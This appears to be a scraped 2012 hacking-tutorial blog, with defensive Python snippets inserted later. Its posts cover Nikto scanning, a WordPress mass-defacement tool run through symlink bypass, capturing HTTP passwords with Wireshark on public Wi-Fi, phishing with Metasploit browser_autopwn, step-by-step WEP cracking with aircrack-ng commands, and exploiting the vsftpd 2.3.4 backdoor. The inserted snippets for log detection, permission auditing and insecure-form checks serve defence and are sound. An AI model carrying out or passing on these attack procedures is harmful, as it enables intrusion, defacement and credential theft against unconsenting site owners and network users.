Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

Nikto is written in Perl and performs tests against web servers in order to identify potential vulnerabilities.

1. Download Nikto from here.

2. Open a terminal and extract it into a folder.

3. Then change into that directory by typing the following in the terminal:

    cd Downloads/nikto-2.1.5

4. Make the nikto.pl file executable (right-click on the file and make it executable).

5. Update it by typing the following command:

    ./nikto.pl -update

6. The final step, to scan a web host, is to type the following in the terminal:

    ./nikto.pl -host IP
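Since the text above notes that Nikto is not stealthy and is obvious in log files, here is the detection side, as an added example that is not part of the original post: it parses Apache combined-format access log lines and reports clients that either announce a Nikto User-Agent or produce a burst of 404s. The SAMPLE_LOG lines and their Nikto test numbers are constructed for the demonstration.

```python
"""Spot a Nikto scan in Apache combined-format access logs.

Added example, not part of the original post: Nikto names itself in its
User-Agent and fires a burst of requests for files that do not exist, so the
two signals used here are the User-Agent and a 404 count per client.
SAMPLE_LOG is constructed for the demonstration (test numbers are made up).
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

NIKTO_UA = 'Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:%s)'
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [07/Dec/2012:10:01:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [07/Dec/2012:10:02:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "%s"' % (NIKTO_UA % "000001"),
    '203.0.113.5 - - [07/Dec/2012:10:02:00 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 210 "-" "%s"' % (NIKTO_UA % "000137"),
    '203.0.113.5 - - [07/Dec/2012:10:02:01 +0000] "GET /phpinfo.php HTTP/1.1" 404 210 "-" "%s"' % (NIKTO_UA % "000291"),
    '203.0.113.5 - - [07/Dec/2012:10:02:01 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "%s"' % (NIKTO_UA % "000402"),
    '198.51.100.7 - - [07/Dec/2012:10:03:00 +0000] "GET /missing.png HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 6.1)"',
])

def detect_scanners(log_text, min_404=3):
    """Return {client_ip: [reasons]} for clients that look like a Nikto run."""
    not_found = defaultdict(int)
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                           # skip lines in another format
        ip = m.group("ip")
        if "nikto" in m.group("ua").lower():
            findings.setdefault(ip, [])
            if "Nikto User-Agent" not in findings[ip]:
                findings[ip].append("Nikto User-Agent")
        if m.group("status") == "404":
            not_found[ip] += 1
    for ip, n in not_found.items():
        if n >= min_404:                       # bursts of misses from one client
            findings.setdefault(ip, []).append("%d responses with status 404" % n)
    return findings
```

A single ordinary client with one broken image link (198.51.100.7 above) stays under the threshold, while the scanner trips both signals.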

Wordpress Mass Defacement Tool


WordPress, being one of the most widely used CMS platforms, is one of the favourite targets of hackers nowadays along with WHMCS. Instead of directly targeting WordPress functionality and vulnerable plugins, it has been observed that hackers target a vulnerable website on the same server and use it to bypass server restrictions in order to read the configuration file and hence break into the WordPress installation. This method is commonly known as Symlink Bypassing in the black hat world and server bypassing in the white hat community.
Now it is a tedious task for an attacker to manually connect to the database and then manually replace the index file of WordPress for a successful defacement. Therefore hackers use mass defacers. These are tools used by hackers to change the index files of all the websites present on the server to their own defacement page; this usually happens when the hacker has root-level access on the server.

Recently, the admin of Team Root, "Mauritania Attacker", mailed me his tool for review, which can be used by attackers to deface all the WordPress websites present on the same server.

How Does It Work?

For this tool to work the only requirement is that the server is vulnerable to symlink bypass. The tool will automatically symlink all the WordPress websites on the server and replace their index files with the page you provide (.html or .php).

How To Use It?

The usage is extremely simple and I really don't see the purpose of creating a tutorial; however, this blog is mostly read by newbies, so I will add some screenshots.

Requirements

1. Shell On The Server
2. The shell should not be secured from Symlink Bypassing.
3. Wordpress Mass Defacement Tool

Once you have completed all of the above requirements, just upload the Mass Defacement tool to the web server; it will look something like this. Now replace the contents of the index URL field with your own defacement page.


Next you will see the results for the websites you have been able to deface:



And finally you can view the list of all the websites you were able to deface:



How To Protect Yourself?

In order to protect your website from being defaced, all you need to do is change the permissions of your index files to 400, so that no one else will be able to change them. However, if an attacker has root-level access on the server there is no way of protecting your website, since the attacker can simply change the permissions back.
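A way to check that advice has actually been applied across a shared host, as an added example that is not the post's tool: it walks a directory tree, reports every index file that still has a write bit set, and also reports any index file that is itself a symlink, since that is the footprint the symlink-bypass technique leaves. The demo() helper builds a constructed two-site tree in a temporary directory.

```python
"""Audit web roots for index files that are still writable (added example, not
the post's tool). The post's advice is chmod 400 on index files; this walks a
directory tree and reports any index.* with a write bit for anyone, plus any
index file that is a symlink rather than a regular file.
"""
import os
import stat
import tempfile

INDEX_NAMES = {"index.php", "index.html", "index.htm"}
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH

def writable_index_files(root):
    """Return relative paths of index files with any write bit set or that are symlinks."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in INDEX_NAMES:
                continue
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode     # lstat: do not follow the link
            if stat.S_ISLNK(mode):            # a symlinked index is itself suspicious
                hits.append(os.path.relpath(path, root) + " (symlink)")
            elif mode & WRITE_BITS:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)

def demo():
    """Build a constructed two-site tree (site1 at 644, site2 at 400) and audit it."""
    root = tempfile.mkdtemp()
    for site, mode in (("site1", 0o644), ("site2", 0o400)):
        os.makedirs(os.path.join(root, site, "public_html"))
        path = os.path.join(root, site, "public_html", "index.php")
        with open(path, "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        os.chmod(path, mode)
    return writable_index_files(root)

if __name__ == "__main__":
    for hit in demo():
        print("writable or symlinked index:", hit)
```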

Thursday, December 6, 2012

How To Hack HTTP Passwords With Wireshark


Most websites on the Internet use the HTTP protocol for communication, which runs on port 80; the data sent to the server is unencrypted and goes in plain text. If you are using HTTPS (port 443), the data is sent to the server encrypted. Whenever you enter data in a form, your browser sends either a POST or a GET request to the web server; in most cases you will see the POST method used in forms. Now most websites on the Internet use HTTP for authentication, which enables an attacker on the local area network to sniff everything that goes through that form. That is the reason you see websites like PayPal, eBay and Gmail using HTTPS.


In this tutorial, I will show how a hacker can capture passwords sent via HTTP to the server with Wireshark. Wireshark is a network analysis tool used to capture and analyze all the packets being sent from your computer to the server.

Attack Scenario

Let's suppose that you went to Starbucks to have a coffee with your friend and connected to the Wi-Fi hotspot. An attacker comes in, starts Wireshark and captures your HTTP POST passwords, thereby compromising your security.

How To Hack HTTP Passwords With Wireshark

Before I show you how to capture HTTP passwords, I would like to let you know that for a successful capture your network card should be in promiscuous mode, which enables it to capture all the traffic going through your network.

Step 1 - First of all, download Wireshark from the official website and install it on your computer.

Step 2 - Next open up Wireshark, click on Analyze and click on Interfaces at the top.


Step 3 - Next choose the appropriate interface and click on Start. Wireshark will start sniffing the network.

Step 4 - Continue sniffing for around 10 minutes.

Step 5 - After 10 minutes, stop the packet sniffing by going to the Capture menu and clicking on Stop.

In the meantime, log into any website (for testing purposes) that uses HTTP authentication.

Step 6 - Next set the filter to http.request.method == "POST". This will show all the HTTP POST requests going through your computer. Start analyzing the packets and locate the website you logged into that uses HTTP authentication.



Step 7 - Next click on Follow TCP Stream. You will see the username and password that you entered. In this particular scenario I logged in to my WordPress account, where I entered the username admin and the password rafayhackingarticles. Since WordPress uses HTTP for authentication, the data that was entered was captured successfully.


Countermeasures

The best countermeasure would be to use a VPN, so that all the traffic would be encrypted.
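On the site-owner side, the question raised above is which login forms still submit over plain HTTP. As an added example that is not part of the original post, this parser finds forms containing a password field and reports those whose (resolved) action URL is not HTTPS; the SAMPLE_HTML and the example.com URLs are constructed for the demonstration.

```python
"""Find login forms that would submit a password over plain HTTP.

Added example, not from the original post. A form with a password field whose
action resolves to an http:// URL is exactly what the Wireshark filter above
would catch on the wire. SAMPLE_HTML is constructed for the demonstration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormAuditor(HTMLParser):
    """Collect (action_url, has_password_field) for every form on a page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A missing or relative action resolves against the page URL.
            action = urljoin(self.page_url, attrs.get("action") or "")
            self._current = [action, False]
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None

def insecure_login_forms(html, page_url):
    """Return action URLs of password forms that would be sent over plain HTTP."""
    auditor = FormAuditor(page_url)
    auditor.feed(html)
    return [action for action, has_pw in auditor.forms
            if has_pw and urlsplit(action).scheme != "https"]

SAMPLE_HTML = """
<form action="/wp-login.php" method="post">
  <input type="text" name="log"><input type="password" name="pwd">
</form>
<form action="https://example.com/search" method="get"><input name="q"></form>
"""
```

The same login form is flagged when the page is served over http:// and passes when it is served over https://, which is the whole point of the countermeasure.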


Tuesday, December 4, 2012

how to Browser Autopwn attack in metasploit?


In this article we will examine the effectiveness of the Metasploit browser autopwn module. The basic idea behind this module is that it creates a web server on our local machine which hosts different kinds of browser exploits. When the user opens the malicious link, the exploits are run against the user's browser, and if one of them is successful a meterpreter session will open.
In order to use this attack we have to open the Metasploit framework and use the browser_autopwn module. In the next image you can see the available options and default settings for this module.



We will set the LHOST to our IP address, the SRVPORT to port 80 (otherwise the link that we have to send to the user must be in the format IP:8080) and the URIPATH to / in order to prevent Metasploit from setting up a random URL.

After the execution of this module we will notice that different exploits for a variety of browsers start loading on our web server.

Now we can share the link by email with our client's employees. If any user opens the malicious link, the autopwn module will try all of these exploits to see whether it can break into the client. If the browser is vulnerable to any of them, a meterpreter session will open.

Browser-based attacks are not stable, because browsers can crash, which means that the meterpreter session or shell access will be lost. For that reason Metasploit will try to migrate to another, more stable process as soon as possible.

Monday, December 3, 2012

How to crack wi-fi password in ubuntu?


For this purpose we are going to use Ubuntu. First we have to install the aircrack program in the OS.
(1) Install aircrack
sudo apt-get install aircrack-ng

(2) You need to become root first. For this purpose type "su -" and enter your password.

(3) Now type the following command in the terminal
Code:
# iwconfig wlan0 mode monitor
Note: If some sort of error occurs, type "# iwconfig" in a terminal to check the name of your wireless interface.

(4) After that it's time to scan for a wireless network which we will compromise for educational purposes. This time we will use the command:
Code:
# airodump-ng wlan0

(5) Once you've found one, abort the process with Ctrl+C. Now that we have our target it's time to collect some information about the network. First of all copy the MAC address of the access point, which is listed as the BSSID (it should look something like 00:15:EB:E7: …). We also need to know the channel it's currently working on (shown under CH, e.g. 6). So let's gather our information with airodump-ng:
Code:
# airodump-ng -w wep -c 6 --bssid 00:15:EB:E7: … wlan0

(6) Now we need to open another terminal in which we will use the ARP replay attack to increase the number of data packets and gather initialization vectors (IVs) from the access point chosen earlier.
Code:
# aireplay-ng -3 -b 00:15:EB:E7: … wlan0

(7) Let's go back to terminal 1 and have a look at the data packets. We need to have collected over 20 000 packets. If so, abort both airodump-ng and aireplay-ng.
Now we have everything required to recover the key of the wireless network. We do that with aircrack as shown below:
Code:
# aircrack-ng wep-03.cap

Then you should see that the key has been decrypted 100% successfully, along with the key itself.

Sunday, December 2, 2012

How to exploit VSFTPD ?


VSFTPD, which stands for "Very Secure FTP Daemon"[1], is an FTP server for Unix-like systems, including Linux.

VSFTPD is an FTP server that can be found on Unix operating systems like Ubuntu, CentOS, Fedora and Slackware. By default this service is secure; however, a major incident happened in July 2011 when someone replaced the original download with a version that contained a backdoor. The backdoor exists in version 2.3.4 of VSFTPD and it can be exploited through Metasploit.

So first we scan port 21 to check whether it is running vsftpd 2.3.4 or not; for this purpose you can use nmap.
So let's assume that we have scanned a host and discovered version 2.3.4 of VSFTPD running on the system.
We can open the Metasploit framework in order to search for the vsftpd module.

As we can see there is only one module that we can use, so we will start configuring the module appropriately. In the next screenshot you can see the configuration that this exploit needs in order to execute successfully.